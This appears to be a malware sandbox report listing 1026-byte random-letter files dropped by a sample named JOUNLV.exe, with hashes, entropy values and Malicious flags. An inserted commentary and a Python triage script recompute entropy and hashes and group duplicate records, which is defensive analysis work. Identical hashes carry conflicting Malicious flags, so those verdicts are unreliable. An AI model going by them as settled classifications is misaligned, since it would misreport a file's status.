SHA-256: F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
SHA-512: 10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
Malicious: false
Preview: RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

Process: C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.688284131239007
Encrypted: false
SSDEEP: 24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5: E8ACCA0F46CBA97FE289855535184C72
SHA1: 059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256: CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512: 185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.690895772725941
Encrypted: false
SSDEEP: 24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5: A002E80B55673139253599B753BDC01A
SHA1: 6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256: F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512: D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious: false
Preview: JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

Process: C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.694982189683734
Encrypted: false
SSDEEP: 24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5: E49F84B05A175C231342E6B705A24A44
SHA1: 41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256: EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512: 84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.688284131239007
Encrypted: false
SSDEEP: 24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5: E8ACCA0F46CBA97FE289855535184C72
SHA1: 059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256: CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512: 185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious: false

Process: C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.700014595314478
Encrypted: false
SSDEEP: 24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5: 960373CA97DEDBA8576ECF40D0D1E39D
SHA1: E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256: 501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512: 93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious: false
Preview: YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

Process: C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.6994061563025005
Encrypted: false
SSDEEP: 24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5: A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1: 6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256: A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512: 0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious: false
Preview: ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
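Every dropped file above from JOUNLV.exe has the same shape: 1026 bytes, "ASCII text, with very long lines (1024), with CRLF line terminators", an "Entropy (8bit)" between 4.688 and 4.700, and a preview of nothing but capital letters. That entropy is the fingerprint of 1024 letters drawn uniformly from A-Z plus a CRLF, since log2(26) is about 4.70, so these are random-letter filler rather than encrypted payloads (the sandbox's "Encrypted: false" agrees). Note also that the SHA-256 CFB1D698... appears twice in this list, once with Malicious: true and once with Malicious: false, so grouping records by content hash before reading verdicts is worthwhile. The following script, which is an added example and not Joe Sandbox code, recomputes the 8-bit entropy and the MD5/SHA-256 values the report shows for a given file, applies a random-uppercase-filler heuristic, and groups records by SHA-256. The sample records are constructed in the script (they are not the files from the report), and the 0.15 tolerance around log2(26) and the 7.0 bits/byte "high entropy" cut-off are assumptions for illustration, not the sandbox's own thresholds.

```python
"""Entropy and hash triage for sandbox "dropped file" records.

Added example; not Joe Sandbox code. The entropy formula is the usual
Shannon entropy in bits per byte, which is what sandbox reports label
"Entropy (8bit)". The filler heuristic, its 0.15 tolerance and the 7.0
bits/byte cut-off are assumptions chosen for illustration.
"""
import hashlib
import math
import random
from collections import Counter

UPPER_CRLF = set(b"ABCDEFGHIJKLMNOPQRSTUVWXYZ\r\n")
LOG2_26 = math.log2(26)          # ~4.7004, the entropy of uniform A-Z text


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or single-symbol data, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def make_filler_record(seed: int) -> bytes:
    """Constructed test data shaped like the dropped files in the report:
    1024 uniformly random uppercase letters followed by CRLF (1026 bytes).
    Deterministic per seed so the example is reproducible."""
    rng = random.Random(seed)
    letters = bytes(rng.choice(b"ABCDEFGHIJKLMNOPQRSTUVWXYZ") for _ in range(1024))
    return letters + b"\r\n"


def classify(data: bytes) -> dict:
    """Recompute the fields an analyst cross-checks and attach a verdict.

    Verdicts (assumed heuristic, not a sandbox rule):
      'random-uppercase-text': only A-Z plus CR/LF and entropy within 0.15 of
                               log2(26); letter-by-letter random filler.
      'high-entropy'         : >= 7.0 bits/byte; likely compressed or encrypted.
      'other'                : anything else.
    """
    h = shannon_entropy_8bit(data)
    record = {
        "size": len(data),
        "entropy": round(h, 6),
        "md5": hashlib.md5(data).hexdigest().upper(),      # report prints hashes in upper case
        "sha256": hashlib.sha256(data).hexdigest().upper(),
    }
    if data and set(data) <= UPPER_CRLF and abs(h - LOG2_26) < 0.15:
        record["verdict"] = "random-uppercase-text"
    elif h >= 7.0:
        record["verdict"] = "high-entropy"
    else:
        record["verdict"] = "other"
    return record


def find_duplicate_hashes(records: list) -> dict:
    """Map each SHA-256 that occurs more than once to the indices of its records,
    so repeated drops of identical content (and conflicting verdicts on them) stand out."""
    groups: dict = {}
    for i, rec in enumerate(records):
        groups.setdefault(rec["sha256"], []).append(i)
    return {h: idx for h, idx in groups.items() if len(idx) > 1}


if __name__ == "__main__":
    samples = [
        make_filler_record(1),           # filler, like the report's dropped files
        make_filler_record(2),           # another filler file, different content
        make_filler_record(1),           # same content dropped again
        bytes(range(256)) * 4,           # every byte value equally often: 8.0 bits/byte
        b"\x00" * 1026,                  # a single repeated byte: 0.0 bits/byte
    ]
    records = [classify(s) for s in samples]
    for rec in records:
        print(f'{rec["size"]:5d}  {rec["entropy"]:.6f}  {rec["verdict"]:22s}  {rec["sha256"][:16]}...')
    print("duplicate SHA-256 groups:", find_duplicate_hashes(records))
```

Run against the actual files extracted from a sandbox, `classify(open(path, "rb").read())` should reproduce the Size, Entropy (8bit), MD5 and SHA-256 fields shown for each record; a mismatch means the artifact on disk is not the one the report describes. The three filler samples land at roughly 4.69 bits/byte, the same band as the seven records above.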

Process: C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.700014595314478
Encrypted: false
SSDEEP: 24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5: 960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688505748329201
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                                                                                                                                                                                                                          MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                                                                                                                                                                                                                          SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                                                                                                                                                                                                                          SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                                                                                                                                                                                                                          SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                                          MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                                          SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                                          SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                                          SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.69782189124949
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                                                                                                                                                                                                          MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                                                                                                                                                                                                          SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                                                                                                                                                                                                          SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                                                                                                                                                                                                          SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
